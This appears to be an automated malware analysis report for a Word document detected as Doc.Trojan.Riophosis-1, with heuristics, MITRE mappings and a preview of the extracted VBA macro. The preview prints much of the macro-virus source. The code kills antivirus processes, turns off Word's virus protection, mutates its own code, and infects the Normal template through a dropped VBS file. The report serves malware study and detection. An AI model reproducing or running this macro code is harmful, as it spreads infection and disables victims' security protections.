MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that execute upon document closure. The script attempts to establish persistence by writing an empty string to the registry key 'Hkey_LoCAL_MACHInE\SoFTwAre\MICROSOfT\windowS\currENtVerSiOn\rUN\nAv Agent', effectively removing a previously configured entry. It also references a file path 'C:\Windows\RioPhoSIS.sYS', suggesting a potential download or execution of a second-stage payload. The ClamAV detection 'Doc.Trojan.Riophosis-1' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Riophosis-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Riophosis-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6398 bytes |
SHA-256: 924eefaf69ec5f07a34e82bdbdd922a95ef6781def7db610a09d736731ae06df |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub dOCUmENt_CLoSE()
For Each PRog In Tasks
If InStr(1, UCase(PRog.Name), Chr(78) & Chr(65) & Chr(86)) Then PRog.Close
If InStr(1, UCase(PRog.Name), Chr(65) & Chr(78) & Chr(84) & Chr(73) & Chr(86) & Chr(73) & Chr(82) & Chr(85) & Chr(83)) Then PRog.Close
Next
System.PrivateProfileString("", "Hkey_LoCAL_MACHInE\SoFTwAre\MICROSOfT\windowS\currENtVerSiOn\rUN\", "nAv Agent") = ""
BThHTrRGcfG = 122174.617662907 Or 684237.451576531 '
With Application
Nohkjo = 712368.431593716 And 76435.6087220907 '
.DisplayAlerts = wdAlertsNone
onnchbl = 586217.413240314 + 739983.593530834 '
.EnableCancelKey = wdCancelDisabled
With .Options
prdcfhont = naqrpbedd Eqv jhhtejqrf '
.VirusProtection = 0
qkqjc = qnkkj Xor mhajq '
.ConfirmConversions = 0
bfmhcipmiho = ifgbkceksca And isdarfbtkii '
jebnnsl = soiphpj Eqv rrqfhdr '
.SaveNormalPrompt = 0
End With
jooibrjff = 834244.311075747 Eqv 531363.790344357 '
End With
If ThisDocument = ActiveDocument Then Set Target = NormalTemplate
jidbj = 894053.339973629 Xor 563240.203284502 '
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument
SouRCefile = Environ$("wInDIR") & "\RioPhoSIS.sYS"
hhisihddrsoqqa = jqalsipposdlqc + teftpdoekdsgdq '
VBSBackup = Environ$("wINdIR") & "\RiOpHoSiS.vBs"
cjcflschfea = 573881.886711717 Or 305555.097677171 '
With ThisDocument.VBProject.VbCOmPOnEnTs(1).coDEmodULE
vCOde = UCase(.lines(1, .cOUNTOfLinES))
ofsijmkcfr = simapslfmh Or seploqjnho '
poLy
jerqtcpd = egakqgod + lgapdshn '
btgfbdkkthlas = 7975.92796003819 Or 452493.274713457 '
For couNter = 1 To Len(vCOde)
tbhrrihnjrkfgm = 164667.97812742 And 738947.1293993 '
aieokojmqqks = 990259.014737248 Xor 200465.538307607 '
T = Mid(vCOde, couNter, 1)
cngifhsttntm = 226566.505363047 Or 326078.92330277 '
onlkkhtsni = 238983.749777913 Or 116403.046076238 '
If Asc(T) < 90 And Asc(T) > 65 Then T = Chr(Asc(T) + Int(Rnd * 2) * 32)
nndemtmnfai = ogpjoiggmph Eqv spedatqflge '
NewVCoDe = NewVCoDe & T
Next
lnttribtdcte = 104719.176477313 And 754792.233507335 '
fegdn = gfrod + fsgkl '
Open SouRCefile For Output As #1
Print #1, NewVCoDe
paqmpgjblfqbs = 729437.277439892 And 284994.436417937 '
Close #1
otjqmctjf = gmsnkcttf And pnrkedfsl '
Open VBSBackup For Output As #1
Print #1, "on erROr resuME neXt"
llhfcm = dmgedh Or qkomje '
Print #1, "sEt fsO = creATEoBJeCt(""word.AppLiCATION"")"
Print #1, "WitH fSO.OPtIoNS"
eogcqpetsao = 256962.400012136 + 285123.122717321 '
Print #1, ".VIRUsProteCtiON = 0"
Print #1, ".confIRmcoNveRsIons = 0"
ckhcokla = 889230.673382878 + 800425.265495718 '
Print #1, ".SAVENoRmALPRompt = 0"
Print #1, ".APPLicATion.DiSPlAYAlertS = WdALERtSnonE"
nqooalblt = 672370.715110302 And 794389.585992157 '
Print #1, "EnD WIth"
irjnheodbcis = jpjrbhamcaqd Xor itsbpdoltaql '
Print #1, "wITh FSO.NormAltempLATE.VbPrOJECT.vBcOMPOnenTs(1)"
Print #1, ".CODEMOdulE.delETElINes 1, .cODEMOdULE.CoUntOflinES"
brpteakmgssshh = fqeedohtpfrcjg Xor ffheojcopggqpo '
Print #1, ".cOdemODULe.ADDFRomfILe """ & SouRCefile & """"
leihlkbhgs = pdffctlges Eqv enkdpqdiab '
Print #1, "eND wiTh"
nhpbilpaie = 519876.43706274 And 253826.543181717 '
Print #1, "FsO.nORMAlTeMPlATE.sAve"
eentipgcmd = pasjcrbfjc - bekjroicqk '
Print #1, "fsO.QUit"
qjamoh = relefg - hltthm '
Close #1
geqpeisebabt = 194717.331718326 - 799250.578331172 '
patblqtr = jtjkmqat + cioknceo '
cgeng = lepio Or orerm '
sjniidnddmp = segahmijlqj Xor nerkjhqjsbi '
System.PrivateProfileString("",
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.